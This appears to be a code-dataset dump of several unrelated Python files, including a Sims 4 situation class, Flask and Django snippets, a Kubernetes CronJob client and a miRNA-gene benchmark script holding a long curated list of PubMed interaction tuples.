8a4dee86ca5dfb4dc02ea1a613fe4540eb4f1125 | 1,553 | py | Python | S4/S4 Library/simulation/situations/complex/suntanner_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | 1 | 2021-05-20T19:33:37.000Z | 2021-05-20T19:33:37.000Z | S4/S4 Library/simulation/situations/complex/suntanner_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | S4/S4 Library/simulation/situations/complex/suntanner_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | from sims4.tuning.tunable_base import GroupNames
from situations.complex.give_job_object_situation_mixin import GiveJobObjectSituationMixin
from situations.situation import Situation
from situations.situation_complex import SituationComplexCommon, CommonSituationState, SituationStateData, TunableSituationJobAndRoleState
import sims4
logger = sims4.log.Logger('SuntannerSituation', default_owner='msundaram')
class _SuntannerSituationState(CommonSituationState):
    pass


class SuntannerSituation(GiveJobObjectSituationMixin, SituationComplexCommon):
    INSTANCE_TUNABLES = {'situation_default_job_and_role': TunableSituationJobAndRoleState(description='\n            The default job that a visitor will be in during the situation.\n            '), 'default_state': _SuntannerSituationState.TunableFactory(description='\n            The default state of this situation.\n            ', display_name='State', tuning_group=GroupNames.STATE)}
    REMOVE_INSTANCE_TUNABLES = Situation.NON_USER_FACING_REMOVE_INSTANCE_TUNABLES

    @classmethod
    def default_job(cls):
        return cls.situation_default_job_and_role.job

    @classmethod
    def _states(cls):
        return [SituationStateData(1, _SuntannerSituationState, factory=cls.default_state)]

    @classmethod
    def _get_tuned_job_and_default_role_state_tuples(cls):
        return [(cls.situation_default_job_and_role.job, cls.situation_default_job_and_role.role_state)]

    def start_situation(self):
        super().start_situation()
        self._change_state(self.default_state())
| 51.766667 | 389 | 0.792659 | 167 | 1,553 | 7.047904 | 0.401198 | 0.050977 | 0.064571 | 0.074766 | 0.116398 | 0.094308 | 0.069669 | 0.069669 | 0.069669 | 0 | 0 | 0.002987 | 0.137798 | 1,553 | 29 | 390 | 53.551724 | 0.876027 | 0 | 0 | 0.130435 | 0 | 0 | 0.1481 | 0.019317 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0.043478 | 0.217391 | 0.130435 | 0.695652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
8a6421e5b529d91386be0794928d1cf7f31ecb6a | 1,186 | py | Python | octopus/assets.py | quaintm/octopus | 95a732207ee5f43cd0065d8ea6c643cbf3df2d61 | [
"BSD-3-Clause"
] | null | null | null | octopus/assets.py | quaintm/octopus | 95a732207ee5f43cd0065d8ea6c643cbf3df2d61 | [
"BSD-3-Clause"
] | null | null | null | octopus/assets.py | quaintm/octopus | 95a732207ee5f43cd0065d8ea6c643cbf3df2d61 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from flask.ext.assets import Bundle, Environment
css = Bundle(
    "libs/bootstrap/dist/css/bootstrap.css",
    "libs/dataTables/dataTables.bootstrap.css",
    "libs/dataTables/dataTables.tableTools.css",
    "libs/font-awesome4/css/font-awesome.css",
    "libs/bootstrap-datepicker/css/datepicker3.css",
    "libs/bootstrap-tagsinput/dist/bootstrap-tagsinput.css",
    "css/style.css",
    filters="cssmin",
    output="public/css/common.css"
)

js = Bundle(
    "libs/jQuery/dist/jquery.js",
    "libs/bootstrap/dist/js/bootstrap.js",
    "libs/dataTables/jquery.dataTables.js",
    "libs/dataTables/dataTables.bootstrap.js",
    "libs/dataTables/dataTables.tableTools.js",
    "libs/bootstrap-datepicker/js/bootstrap-datepicker.js",
    "libs/bootstrap-tagsinput/dist/bootstrap-tagsinput.js",
    "libs/typeahead.js/dist/typeahead.bundle.js",
    "libs/pagedown/Markdown.Converter.js",
    "libs/pagedown/Markdown.Sanitizer.js",
    "js/plugins.js",
    "js/script.js",
    # filters='jsmin',
    output="public/js/common.js"
)
# Warning: for fonts, you need to copy over everything manually for now to static/fonts
assets = Environment()
assets.register("js_all", js)
assets.register("css_all", css)
| 30.410256 | 87 | 0.736088 | 157 | 1,186 | 5.547771 | 0.33121 | 0.061998 | 0.110218 | 0.059701 | 0.183697 | 0.101033 | 0 | 0 | 0 | 0 | 0 | 0.002801 | 0.096965 | 1,186 | 38 | 88 | 31.210526 | 0.810458 | 0.104553 | 0 | 0 | 0 | 0 | 0.703214 | 0.63138 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.033333 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a65dcf26657b17b7c976ff8dd2663fc7ac5793d | 473 | py | Python | users/forms.py | gurnitha/django-fantom-blog | f9533be63ea71ce21fd9ddb37cf6f16eee905d88 | [
"Unlicense"
] | null | null | null | users/forms.py | gurnitha/django-fantom-blog | f9533be63ea71ce21fd9ddb37cf6f16eee905d88 | [
"Unlicense"
] | null | null | null | users/forms.py | gurnitha/django-fantom-blog | f9533be63ea71ce21fd9ddb37cf6f16eee905d88 | [
"Unlicense"
] | null | null | null | # users/forms.py
# Django modules
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django import forms
class RegisterForm(UserCreationForm):
    username = forms.CharField(max_length=50)
    email = forms.EmailField(max_length=50)
    password1 = forms.CharField()
    password2 = forms.CharField()

    class Meta(UserCreationForm.Meta):  # inherit the form's Meta, not the form itself
        model = User
        fields = ('username', 'email', 'password1', 'password2')
8a66876f05b1b369b3cf906bf07be210c4813ad8 | 74 | py | Python | Condicionais/If.py | caiojjj/python_1_USP_coursera | 1ac03cc0d50f505f8a7ef364cb04b90d41235b9b | [
"MIT"
] | null | null | null | Condicionais/If.py | caiojjj/python_1_USP_coursera | 1ac03cc0d50f505f8a7ef364cb04b90d41235b9b | [
"MIT"
] | 1 | 2020-10-13T05:00:06.000Z | 2020-10-17T00:49:17.000Z | Condicionais/If.py | caiojjj/python_1_USP_coursera | 1ac03cc0d50f505f8a7ef364cb04b90d41235b9b | [
"MIT"
] | null | null | null | i = 2
while True:
    if i % 3 == 0:
        break
    print(i)
    i += 2
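Starting from 2, the loop above prints even numbers and stops at the first multiple of 3, so it prints 2 and 4. The same sequence can be expressed declaratively (a sketch using itertools, not part of the exercise):

```python
from itertools import count, takewhile

# count(2, 2) yields 2, 4, 6, ...; takewhile stops before the first multiple of 3.
evens_before_multiple_of_3 = list(takewhile(lambda i: i % 3 != 0, count(2, 2)))
```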
8a71f15e4983c25be8b8c1fedab40345aa59f02b | 1,274 | py | Python | bcs-ui/backend/resources/workloads/cronjob/client.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 599 | 2019-06-25T03:20:46.000Z | 2022-03-31T12:14:33.000Z | bcs-ui/backend/resources/workloads/cronjob/client.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 537 | 2019-06-27T06:03:44.000Z | 2022-03-31T12:10:01.000Z | bcs-ui/backend/resources/workloads/cronjob/client.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 214 | 2019-06-25T03:26:05.000Z | 2022-03-31T07:52:03.000Z | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from backend.container_service.clusters.base.models import CtxCluster
from backend.resources.constants import DEFAULT_CRON_JOB_API_VERSION, K8sResourceKind
from backend.resources.resource import ResourceClient
from backend.resources.workloads.cronjob.formatter import CronJobFormatter
class CronJob(ResourceClient):
    kind = K8sResourceKind.CronJob.value
    formatter = CronJobFormatter()

    def __init__(self, ctx_cluster: CtxCluster):
        super().__init__(ctx_cluster=ctx_cluster, api_version=DEFAULT_CRON_JOB_API_VERSION)
| 47.185185 | 115 | 0.803768 | 175 | 1,274 | 5.731429 | 0.645714 | 0.059821 | 0.059821 | 0.031904 | 0.047856 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011797 | 0.135008 | 1,274 | 26 | 116 | 49 | 0.898367 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.444444 | 0 | 0.888889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
8a75c90846e238637f681187748aa64677cef934 | 232 | py | Python | test/assets/vector_collection.py | pydget/xbrief | 9e91927a98754b0fca1fa55eae9a785b15e963f9 | [
"MIT"
] | null | null | null | test/assets/vector_collection.py | pydget/xbrief | 9e91927a98754b0fca1fa55eae9a785b15e963f9 | [
"MIT"
] | null | null | null | test/assets/vector_collection.py | pydget/xbrief | 9e91927a98754b0fca1fa55eae9a785b15e963f9 | [
"MIT"
] | null | null | null | vector_collection = {
    'none': None,
    'empty': [],
    'numerals': [1, 1, 2, 3, 5, 8, 13, 21],
    'strings': ['foo', 'bar', 'zen'],
    'cities': ['san fransisco', 'buenos aires', 'bern', 'kinshasa-brazzaville', 'nairobi']
}
| 29 | 90 | 0.530172 | 27 | 232 | 4.518519 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054645 | 0.211207 | 232 | 7 | 91 | 33.142857 | 0.612022 | 0 | 0 | 0 | 0 | 0 | 0.409483 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a85f3036c67974130bf8da629d90eecc39be1ee | 32,156 | py | Python | python/mirtex_benchmark/summarizeResults.py | mjoppich/miRExplore | 32760d88d65e7bc23b2bfb49415efcd0a7c7c5e1 | [
"Apache-2.0"
] | null | null | null | python/mirtex_benchmark/summarizeResults.py | mjoppich/miRExplore | 32760d88d65e7bc23b2bfb49415efcd0a7c7c5e1 | [
"Apache-2.0"
] | null | null | null | python/mirtex_benchmark/summarizeResults.py | mjoppich/miRExplore | 32760d88d65e7bc23b2bfb49415efcd0a7c7c5e1 | [
"Apache-2.0"
] | null | null | null | import os,sys
sys.path.insert(0, "/mnt/f/dev/git/miRExplore/python/")
import time
from textdb.MiGenRelDB import MiGenRelDB
from textdb.SentenceDB import SentenceDB
from collections import defaultdict
from natsort import natsorted
sentDB, _ = SentenceDB.loadFromFile("./test/", "./development/pmid2sent", returnAll=True, redoPmid2Sent=True)
mmuDB = MiGenRelDB.loadFromFile("./aggregated_test/mirna_gene.mmu.pmid", ltype="mirna", rtype="gene")
hsaDB = MiGenRelDB.loadFromFile("./aggregated_test/mirna_gene.hsa.pmid", ltype="mirna", rtype="gene")
referenceSolution = [
('16831872','miR-9','ONECUT2','MIR_GENE'),
('16831872','miR-9','SYTL4','MIR_GENE'),
#('17438130','miR-17-92','MYC','GENE_MIR'), # not a miRNA (miR-17-92 cluster)
('17438130','let-7c','MYC','MIR_GENE'),
('17438130','let-7c','MIR17HG','MIR_GENE'), #The PPARalpha-mediated induction of c-myc via let-7C subsequently increased expression of the oncogenic mir-17-92 cluster; these events did not occur in Pparalpha-null mice.
('18185580','miR-335','SOX4','MIR_GENE'),
('18185580','miR-335','TNC','MIR_GENE'),
('18755897','miR-34','TP53','GENE_MIR'), # wrong: acetylated TP53 // correct: Finally, miR-34a itself is a transcriptional target of p53, suggesting a positive feedback loop between p53 and miR-34a.
('18755897','miR-34a','TP53','GENE_MIR'),
('18755897','miR-34a','SIRT1','MIR_GENE'),
('18755897','miR-34','SIRT1','MIR_GENE'),
('18755897','miR-34','TP53','MIR_GENE'), # wrong: acetylated TP53 // correct: Finally, miR-34a itself is a transcriptional target of p53, suggesting a positive feedback loop between p53 and miR-34a.
('18755897','miR-34','CDKN1A','MIR_GENE'), #p21 #miR-34a
('18755897','miR-34','TPT1','MIR_GENE'), # p21
('18755897','miR-34','NSG1','MIR_GENE'), # p21
('18755897','miR-34','H3F3AP6','MIR_GENE'), # p21
('18755897','miR-34','TCEAL1','MIR_GENE'), # p21
('18755897','miR-34','BBC3','MIR_GENE'), #34a, has syn PUMA
('19059913','miR-223','SPI1','GENE_MIR'),
('19059913','miR-223','NFIA','MIR_GENE'),
('19059913','miR-223','NFIC','MIR_GENE'), # TM error, means NFIA
('19059913','miR-223','CSF1R','MIR_GENE'),
('19073597','miR-133a','MYOD1','GENE_MIR'),
('19073597','miR-133a','UCP2','MIR_GENE'),
('19073597','miR-133a','BMIQ4','MIR_GENE'), # has UCP-2 as syn
('19073597','miR-133a-mediated','UCP2','MIR_GENE'),
('19073597','miR-133a-mediated','BMIQ4','MIR_GENE'), # has UCP-2 as syn
('22066022', 'miR-21', 'GPT', 'MIR_GENE'), # missing mirtex: Serum miR-21 levels correlated with histological activity index (HAI) in the liver, alanine aminotransferase (ALT), aspartate aminotransferase , bilirubin, international normalized ratio and gamma-glutamyltransferase.
('19158092','miR-21','PDCD4','MIR_GENE'),
('19158092','miR-21-mediated','PDCD4','MIR_GENE'),
#('19378336','miR-145','KRT7','MIR_GENE'), #no interaction
('19378336','miR-30','KRT7','MIR_GENE'),
('19378336','miR-133a','KRT7','MIR_GENE'),
#('19378336','miR-133b','KRT7','MIR_GENE'), #no interaction in text
#('19378336','miR-195','KRT7','MIR_GENE'), #no interaction
#('19378336','miR-125b','KRT7','MIR_GENE'), #no interaction in text
('19378336','miR-199a','KRT7','MIR_GENE'),
('19524507','miR-31','RHOA','MIR_GENE'),
('19544458','miR-92b','CORO1A','MIR_GENE'), # was p57
('19625769','miR-101','EZH2','MIR_GENE'),
('19723773','miR-290','CDKN2A','MIR_GENE'), # p16
('19839716','miR-205','ERBB3','MIR_GENE'),
('19839716','miR-205','ZEB1','MIR_GENE'),
('19956414','miR-29b','COL1A1','MIR_GENE'),
('19956414','miR-29b','OI4','MIR_GENE'), #COL1A1
('19956414','miR-29b','COL1A2','MIR_GENE'),
('19956414','miR-29b','COL4A1','MIR_GENE'),
('19956414','miR-29b','COL5A1','MIR_GENE'),
('19956414','miR-29b','COL5A2','MIR_GENE'),
('19956414','miR-29b','COL3A1','MIR_GENE'),
('19956414','miR-29b','EDS4A','MIR_GENE'), #COL3A1
('19956414','miR-29b','LAMC1','MIR_GENE'),
('19956414','miR-29b','FBN1','MIR_GENE'),
('19956414','miR-29b','SPARC','MIR_GENE'),
('19956414','miR-29b','ON','MIR_GENE'), #osteonectin
('19956414','miR-29b','BMP1','MIR_GENE'),
('19956414','miR-29b','PCOLC','MIR_GENE'), #BMP1
('19956414','miR-29b','ADAM12','MIR_GENE'),
('19956414','miR-29b','NKIRAS2','MIR_GENE'),
('20012062','miR-221','PSMD9','MIR_GENE'), #p27
('20012062','miR-222','PSMD9','MIR_GENE'),
('20012062','miR-221','SSSCA1','MIR_GENE'), #p27
('20012062','miR-222','SSSCA1','MIR_GENE'),
('20017139','miR-146a','CNTN2','GENE_MIR'),
('20017139','miR-146a','NFKB1','GENE_MIR'),
#('20046097', 'miR-449', 'CDK', 'MIR_GENE'), # CDK not a gene symbol, not in mirtex
('20046097', 'miR-449', 'E2F1', 'MIR_GENE'), #not in mirtex :miR-449 regulates CDK-Rb-E2F1 through an auto-regulatory feedback circuit.
('20046097', 'miR-449', 'RB1', 'MIR_GENE'), #not in mirtex
('20103675','miR-222','PPP2R2A','MIR_GENE'),
('20143188','miR-21','PDCD4','MIR_GENE'),
('20299489','miR-34a','ERK','GENE_MIR'),
('20299489','miR-34a','EPHB2','GENE_MIR'),# ERK syn
('20299489','miR-34a','MAPK1','GENE_MIR'),# ERK syn
('20299489','miR-34a','MAP2K1','MIR_GENE'),
('20299489','miR-221','FOS','MIR_GENE'),
('20299489','miR-222','FOS','MIR_GENE'),
('20299489','miR-34a','FOSB','GENE_MIR'), #mirtex missing: induced miR-34a expression by transactivation via the activator protein-1 binding site in the upstream region of the miR-34a gene.
('20299489','miR-34a','JUND','GENE_MIR'), # activator protein 1 syn
('20299489','miR-34a','JUN','GENE_MIR'), # induced miR-34a expression by transactivation via the activator protein-1 binding site
('20462046','miR-21','PDCD4','MIR_GENE'),
('20478254','miR-183','SLC1A1','MIR_GENE'),
('20478254','miR-96','SLC1A1','MIR_GENE'),
('20478254','miR-182','SLC1A1','MIR_GENE'),
('20498046','miR-200b','ATP2A2','MIR_GENE'),
('20498046','miR-214','ATP2A2','MIR_GENE'),
('20603081','miR-150','MYB','MIR_GENE'),
('20606648', 'miR-34a', 'BIRC5', 'MIR_GENE'), # missing in mirtex, miRNA-34a (miR-34a) induced apoptosis, inhibited survivin expression, and downregulated MAPK pathway in B16F10 cells.
('20620960','miR-200c','FAP','MIR_GENE'),
('20620960','miR-200','FAP','MIR_GENE'),
('20620960','miR-200c','GLMN','MIR_GENE'), # has FAP as syn
('20620960','miR-200','GLMN','MIR_GENE'), # has FAP as syn
('20620960','miR-200','FAS','MIR_GENE'), # CD95; quite indirect though. miR-200c regulates induction of apoptosis through CD95 by targeting FAP-1.
('20620960','miR-200c','FAS','MIR_GENE'), # CD95; quite indirect though. miR-200c regulates induction of apoptosis through CD95 by targeting FAP-1.
('20620960','miR-200','ZEB1','MIR_GENE'), # 200c
('20620960','miR-200','ZEB2','MIR_GENE'), # 200c
('20620960','miR-200','PPCD3','MIR_GENE'), # ZEB1
('20676061','miR-29c','WNT5A','MIR_GENE'),
('20676061','miR-130b','WNT5A','MIR_GENE'),
('20676061','miR-101','WNT5A','MIR_GENE'),
('20676061','miR-30b','WNT5A','MIR_GENE'),
('20676061','miR-140','WNT5A','MIR_GENE'),
('20676061','miR-29c','ZIC1','MIR_GENE'),
('20676061','miR-130b','ZIC1','MIR_GENE'),
('20676061','miR-101','ZIC1','MIR_GENE'),
('20676061','miR-30b','ZIC1','MIR_GENE'),
('20676061','miR-140','ZIC1','MIR_GENE'),
('20676061','miR-29c','TGFB1','MIR_GENE'),
('20676061','miR-130b','TGFB1','MIR_GENE'),
('20676061','miR-101','TGFB1','MIR_GENE'),
('20676061','miR-30b','TGFB1','MIR_GENE'),
('20676061','miR-140','TGFB1','MIR_GENE'),
('20676061','miR-29c','DPD1','MIR_GENE'), # has TGFB1 as syn
('20676061','miR-130b','DPD1','MIR_GENE'),
('20676061','miR-101','DPD1','MIR_GENE'),
('20676061','miR-30b','DPD1','MIR_GENE'),
('20676061','miR-140','DPD1','MIR_GENE'),
('20736365','miR-196','HOXC8','MIR_GENE'),
('20736365','miR-196','HOX3A','MIR_GENE'), # has syn HOXC8
('20859756', 'miR-126', 'TMEM8B', 'GENE_MIR'), # missing mirtex: In particular, miR-126, miR-142-3p, miR-155, miR-552, and miR-630 were all upregulated, whereas miR-146a, miR-152, miR-205, miR-365, miR-449, miR-518c, miR-584, miR-615, and miR-622 were downregulated after NGX6 transfection.
('20859756', 'miR-142', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-155', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-552', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-630', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-146a', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-152', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-205', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-365', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-449', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-518c', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-584', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-615', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-622', 'TMEM8B', 'GENE_MIR'),
('20945501', 'miR-141', 'AR', 'MIR_GENE'), # missing mirtex, inhibition of miR-141 by anti-miR-141 suppressed the growth of the LNCaP subline overexpressing AR.
('20945501', 'miR-141', 'SBMA', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'DHTR', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'AKR1B3', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'AKR1B7', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'AKR1B8', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'AREG', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'FDXR', 'MIR_GENE'), # has AR as syn
('20947507','miR-155','NFKB1','GENE_MIR'),
('20947507','miR-155','CARD11','GENE_MIR'),
('20947507','miR-155','SPI1','MIR_GENE'), # PU.1
#('20947507','miR-155','CD10','MIR_GENE'),
('20947507','miR-155','MME','MIR_GENE'), # CD10
('21088996','miR-21','PDCD4','MIR_GENE'),
('21276775','miR-145','ROBO2','MIR_GENE'),
('21276775','miR-145','SRGAP2','MIR_GENE'),
('21276775','miR-145','SRGAP3','MIR_GENE'), # has SRGAP2 syn
('21276775','miR-214','ROBO2','MIR_GENE'),
('21276775','miR-214','SRGAP2','MIR_GENE'),
('21276775','miR-214','SRGAP3','MIR_GENE'),# has SRGAP2 syn
('21285947','miR-24','INS','MIR_GENE'),
('21285947','miR-26','INS','MIR_GENE'),
('21285947','miR-182','INS','MIR_GENE'),
('21285947','miR-148','INS','MIR_GENE'),
#('21347332','miR-21','serum','GENE_MIR'), # not a gene
('21347332','miR-21','FGF2','GENE_MIR'),
('21347332','miR-21','RHOB','MIR_GENE'),
('21415212','miR-486','OLFM4','MIR_GENE'),
('21454627','mmu-miR-183','mSEL-1L','MIR_GENE'),
('21609717','miR-98-mediated','IL10','MIR_GENE'),
('21609717','miR-98','IL10','MIR_GENE'),
('21609717','miR-98','PTGS2','MIR_GENE'), #COX-2
('21609717','miR-98', 'LPS', 'GENE_MIR'),
('21609717','miR-98', 'IRF6', 'GENE_MIR'), #missing mirtex, MicroRNA-98 negatively regulates IL-10 production and endotoxin tolerance in macrophages after LPS stimulation.
('21666774','miR-21','LH (luteinizing hormone)','GENE_MIR'),
('21666774','miR-132','LH (luteinizing hormone)','GENE_MIR'),
('21666774','miR-212','LH (luteinizing hormone)','GENE_MIR'),
('21685392','miR-143','NOTCH1','MIR_GENE'), #should be N1ICD, TM issue
('21685392','miR-145','NOTCH1','MIR_GENE'),
('21685392','miR-143','TAN1','MIR_GENE'), #should be N1ICD, TM issue
('21685392','miR-145','TAN1','MIR_GENE'),
('21685392','miR-143','RBPJ','GENE_MIR'), #We also identified N1ICD complex binding to CBF1 sites within the endogenous human miR-143/145 promoter.
('21685392','miR-145','RBPJ','GENE_MIR'),
('21685392','miR-143','JAG1','GENE_MIR'), #Using SRF knockdown, we found that Jag-1/Notch induction of miR-143/145 is SRF independent, although full acquisition of contractile markers requires SRF.
('21685392','miR-145','JAG1','GENE_MIR'),
('21685392','miR-143','SRF','GENE_MIR'), #Using SRF knockdown, we found that Jag-1/Notch induction of miR-143/145 is SRF independent, although full acquisition of contractile markers requires SRF.
('21685392','miR-145','SRF','GENE_MIR'),
('21685392','miR-145','MYOCD','GENE_MIR'), #The serum response factor (SRF)/myocardin complex binds to CArG sequences to activate miR-143/145 transcription
('21685392','miR-143','MYOCD','GENE_MIR'),
('21693621','miR-21','MYC','GENE_MIR'),
('21693621','miR-29a','MYC','GENE_MIR'),
('21898400','miR-520c','MTOR','MIR_GENE'),
('21898400','miR-373','MTOR','MIR_GENE'),
('21898400','miR-520c','SIRT1','MIR_GENE'),
('21898400','miR-373','SIRT1','MIR_GENE'),
('21898400','miR-520c','MMP9','MIR_GENE'),
('21898400','miR-373','MMP9','MIR_GENE'),
('21898400','miR-520c','CLG4B','MIR_GENE'), # MMP-9
('21898400','miR-373','CLG4B','MIR_GENE'),
('22123611','miR-195','BCL2','MIR_GENE'),
('22123611','miR-195','CASP3','MIR_GENE'),
('22123611','miR-195','WT1','MIR_GENE'), #missing mirtex: miR-195-treated podocytes underwent actin rearrangement and failed to synthesize sufficient levels of WT-1 and synaptopodin proteins, which suggests that the cells had suffered injuries similar to those observed in diabetic nephropathy in both humans and animal models.
('22123611','miR-195','SYNPO','MIR_GENE'),
('22123611','miR-195','GUD','MIR_GENE'),
('22139444','miR-30c','MTA1','MIR_GENE'),
('22249219','miR-214','ADORA2A','MIR_GENE'),
('22249219','miR-15','ADORA2A','MIR_GENE'),
('22249219','miR-16','ADORA2A','MIR_GENE'),
('22269326','miR-29b','COL1A1','MIR_GENE'),
('22269326','miR-29b','COL3A1','MIR_GENE'),
('22269326','miR-29b','EDS4A','MIR_GENE'), #COL3A1 syn
('22269326','miR-29b','COL5A1','MIR_GENE'),
('22269326','miR-29b','ELN','MIR_GENE'),
('22286762','miR-21','NF-kappaB','GENE_MIR'),
('22286762','miR-10b','NF-kappaB','GENE_MIR'),
('22286762','miR-17','NF-kappaB','GENE_MIR'),
('22286762','miR-9','NF-kappaB','GENE_MIR'),
('22569260','miR-223','FOXO1','MIR_GENE'),
('22569260','miR-223','FKHR','MIR_GENE'), # FOXO1 syn
('22634495','miR-10a','CHL1','MIR_GENE'),
('22634495','miR-10a','DDX11','MIR_GENE'), # CHL1 syn
('22698995','let-7','BACH1','MIR_GENE'),
('22698995','let-7b','BACH1','MIR_GENE'),
('22698995','let-7c','BACH1','MIR_GENE'),
('22698995','miR-98','BACH1','MIR_GENE'),
#same gene symbol
('22698995','let-7','BRIP1','MIR_GENE'),
('22698995','let-7b','BRIP1','MIR_GENE'),
('22698995','let-7c','BRIP1','MIR_GENE'),
('22698995','miR-98','BRIP1','MIR_GENE'),
('22698995','let-7','HMOX1','MIR_GENE'),
('22761336','miR-96','REV1','MIR_GENE'),
('22761336','miR-96','RAD51','MIR_GENE'),
('22761336','miR-96','RECA','MIR_GENE'), #RAD51
('22761336','miR-96','RAD51A','MIR_GENE'),
('22847613','miR-130b','TP53','GENE_MIR'),
('22847613','miR-130b','ZEB1','MIR_GENE'),
('22847613','miR-130b','PPCD3','MIR_GENE'), # zeb1
('22891274','miR-146a','NFKB1','GENE_MIR'),
('22891274','miR-146a','NFKB1','MIR_GENE'),
('22891274','miR-146a','TRAF6','MIR_GENE'),
('22891274','miR-146a','IRAK1','MIR_GENE'),
('22925189','miR-30c','ERBB2','MIR_GENE'), #Her-2
('22925189','miR-30d','ERBB2','MIR_GENE'),
('22925189','miR-30e','ERBB2','MIR_GENE'),
('22925189','miR-532','ERBB2','MIR_GENE'),
('22955854','miR-144','ZFX','MIR_GENE'),
('22956424','miR-21','PTEN','MIR_GENE'),
('22956424','miR-21','MHAM','MIR_GENE'), # has PTEN syn
('22956424','miR-21','BZS','MIR_GENE'), # has PTEN syn
('22982443','miR-200c','BMI1','MIR_GENE'),
('22982443','miR-200c','ABCG2','MIR_GENE'),
('22982443','miR-200c','ABCG5','MIR_GENE'),
('22982443','miR-200c','MDR1','MIR_GENE'),
('22982443','miR-200c','TBC1D9','MIR_GENE'), # has syn MDR1
('22982443','miR-200c','ABCB1','MIR_GENE'), # has syn MDR1
('22982443','miR-200c','CDH1','MIR_GENE'),
('23010597','miR-134','FOXM1','MIR_GENE'),
('23010597','miR-134','FKHL16','MIR_GENE'), # has FOXM1 as syn
('23010597','miR-134','ITK','MIR_GENE'), # has EMT as syn; mirtex missing: Functional assays demonstrated that miR-134 inhibited EMT in NSCLC cells.
('23010597','miR-134','SLC22A3','MIR_GENE'), # has EMT as syn
('23041385','miR-21','CRP','MIR_GENE'),
#('23041385','miR-21','fibrinogen','MIR_GENE'), # not a gene
('23041385','miR-21','TGFB2','MIR_GENE'),
('23097316','miR-34c','RARg','MIR_GENE'),
('23113351','miR-29','TP53','MIR_GENE'), # missing in mirtex: While miRNA-29 members induced apoptosis through p53 gene activation, the effect of miRNA-29a on osteoblastic cells was independent on p53 expression level.
('23113351','miR-29a','TP53','MIR_GENE'),
('23113351','miR-29','BCL2','MIR_GENE'),
('23113351','miR-29','MCL1','MIR_GENE'),
('23113351','miR-29','CLEC4D','MIR_GENE'), # CLEC4D has syn mcl
('23113351','miR-29a','CLEC4D','MIR_GENE'), # CLEC4D has syn mcl
#('23113351','miR-29','E2F1','MIR_GENE'),
#('23113351','miR-29','E2F3','MIR_GENE'),
('23113351','miR-29a','BCL2','MIR_GENE'),
('23113351','miR-29a','MCL1','MIR_GENE'),
